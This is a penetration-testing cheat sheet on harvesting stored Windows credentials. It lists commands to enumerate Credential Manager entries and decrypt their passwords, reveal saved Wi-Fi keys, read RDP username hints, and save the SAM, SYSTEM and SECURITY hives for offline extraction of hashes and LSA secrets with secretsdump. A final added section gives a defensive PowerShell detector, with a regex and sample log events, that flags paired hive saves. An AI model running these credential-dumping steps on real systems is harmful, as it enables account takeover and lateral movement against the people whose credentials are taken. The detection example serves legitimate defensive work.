# Stored Credentials

## <mark style="color:red;">Commands</mark>

<table data-header-hidden data-full-width="true"><thead><tr><th>Command</th><th>Description</th></tr></thead><tbody><tr><td><mark style="color:yellow;"><code>cmdkey /list</code></mark></td><td>Lists credentials stored in Windows Credential Manager.</td></tr><tr><td><mark style="color:yellow;"><code>Get-StoredCredential</code></mark></td><td>Lists credentials stored in Windows Credential Manager (requires the CredentialManager PowerShell module).</td></tr><tr><td><mark style="color:yellow;"><code>Get-StoredCredential -Target "TargetName"</code></mark></td><td>Lists credentials for a specific target in Windows Credential Manager.</td></tr><tr><td><mark style="color:yellow;"><code>$cred = Get-StoredCredential -Target "TargetName"</code></mark></td><td>Retrieves credentials for a specific target from Windows Credential Manager.</td></tr><tr><td><mark style="color:yellow;"><code>$cred.GetNetworkCredential().Password</code></mark></td><td>Retrieves and decrypts the password for a specific target from Windows Credential Manager.</td></tr><tr><td><mark style="color:yellow;"><code>wmic path Win32_VaultCredential</code></mark></td><td>Lists credentials stored in Windows Vault using WMI (may not work on all systems).</td></tr><tr><td><mark style="color:yellow;"><code>reg.exe save hklm\sam C:\temp\sam.save</code></mark></td><td>Saves a copy of the SAM hive. The SAM can be decrypted using secretsdump.py from Impacket.</td></tr><tr><td><mark style="color:yellow;"><code>reg.exe save hklm\system C:\temp\system.save</code></mark></td><td>Saves a copy of the SYSTEM hive.</td></tr></tbody></table>

Lists credentials stored in Windows Vault using `Get-CimInstance` (may not work on all systems):

{% code overflow="wrap" %}

```powershell
Get-CimInstance -Namespace "Root\Microsoft\Windows\Security\*" -ClassName Win32_VaultCredential
```

{% endcode %}

Lists usernames used for Remote Desktop connections from the registry using PowerShell:

```powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Terminal Server Client\Default"
```

Decrypts and retrieves the username for a specific RDP server from the registry using PowerShell:

```powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Terminal Server Client\Servers\ServerName" -Name "UsernameHint"
```

Lists Wi-Fi network profiles and their passwords using PowerShell (requires admin privileges):

{% code overflow="wrap" %}

```powershell
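# Extract each profile name (the text after ": ") and query that profile with key=clear
(netsh wlan show profiles) | Select-String ':\s(.+)$' | ForEach-Object { $name = $_.Matches.Groups[1].Value.Trim(); netsh wlan show profile name="$name" key=clear }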
```

{% endcode %}

## <mark style="color:red;">LSA Secrets</mark>

LSA Secrets is storage used by the Local Security Authority (LSA). Information such as auto-login credentials, service account credentials, or VPN credentials is often stored here.

To extract LSA Secrets you need SYSTEM privileges:

```powershell
reg.exe save hklm\security C:\temp\security.save
```

```powershell
reg.exe save hklm\system C:\temp\system.save
```

LSA Secrets is stored within the Security Registry.

We still need the Syskey from the System hive so we can decrypt the contents of LSA Secrets.

We can then extract the LSA Secrets using secretsdump from Impacket with the command:

```powershell
python3 secretsdump.py -security security.save -system system.save LOCAL
```

## <mark style="color:red;">Copy SAM and System Hive</mark>

To back up the SAM and SYSTEM hives, we can use the following commands:

```powershell
reg save hklm\system C:\Users\backup\system.hive
```

```powershell
reg save hklm\sam C:\Users\backup\sam.hive
```
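
For defenders, the `reg save` hive copies used on this page show up in process-creation logging, and the useful signal is the pairing: SAM or SECURITY saved alongside SYSTEM by the same account on the same machine. The following is an added example, not part of the original page; the function name `Find-HiveSavePair`, the record fields, and the sample events are constructed for illustration.

```powershell
# Constructed sample process-creation records (fields loosely modeled on Event ID 4688).
$events = @(
    [pscustomobject]@{ Time = [datetime]'2024-05-01T10:00:05'; Computer = 'WS01';  User = 'CORP\alice'; CommandLine = 'reg.exe save hklm\sam C:\temp\sam.save' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T10:00:19'; Computer = 'WS01';  User = 'CORP\alice'; CommandLine = 'reg.exe save hklm\system C:\temp\system.save' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T11:30:00'; Computer = 'SRV02'; User = 'CORP\svc1';  CommandLine = 'C:\Windows\System32\reg.exe save HKLM\SECURITY C:\temp\security.save' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T11:31:10'; Computer = 'SRV02'; User = 'CORP\svc1';  CommandLine = 'reg save hklm\system C:\temp\system.save' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T12:00:00'; Computer = 'WS07';  User = 'CORP\bob';   CommandLine = 'reg.exe save hkcu\Software\Example C:\temp\app.reg' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T12:05:00'; Computer = 'WS07';  User = 'CORP\bob';   CommandLine = 'reg.exe query hklm\system\CurrentControlSet\Control' }
)

function Find-HiveSavePair {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 10
    )
    # reg / reg.exe, then "save", then the hive root itself (not a subkey) followed by the output path.
    $pattern = '\breg(\.exe)?"?\s+save\s+"?(hklm|hkey_local_machine)\\(?<hive>sam|security|system)"?\s'

    $hits = foreach ($e in $Events) {
        if ($e.CommandLine -match $pattern) {
            [pscustomobject]@{ Time = $e.Time; Computer = $e.Computer; User = $e.User; Hive = $Matches['hive'].ToUpper() }
        }
    }

    # A SAM or SECURITY copy is only decryptable offline together with SYSTEM,
    # so report the secret-bearing hive when SYSTEM was saved close to it.
    foreach ($group in ($hits | Group-Object Computer, User)) {
        $system  = @($group.Group | Where-Object Hive -eq 'SYSTEM')
        $secrets = @($group.Group | Where-Object Hive -in 'SAM', 'SECURITY')
        foreach ($s in $secrets) {
            $paired = $system | Where-Object { [math]::Abs(($_.Time - $s.Time).TotalMinutes) -le $WindowMinutes }
            if ($paired) {
                [pscustomobject]@{
                    Computer = $s.Computer; User = $s.User; Hive = $s.Hive; Time = $s.Time
                    Finding  = "$($s.Hive) saved with SYSTEM within $WindowMinutes min"
                }
            }
        }
    }
}

Find-HiveSavePair -Events $events | Format-Table -AutoSize
```

The same function can be fed real process-creation events once their timestamp, computer, account, and command-line fields are mapped onto these four properties.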


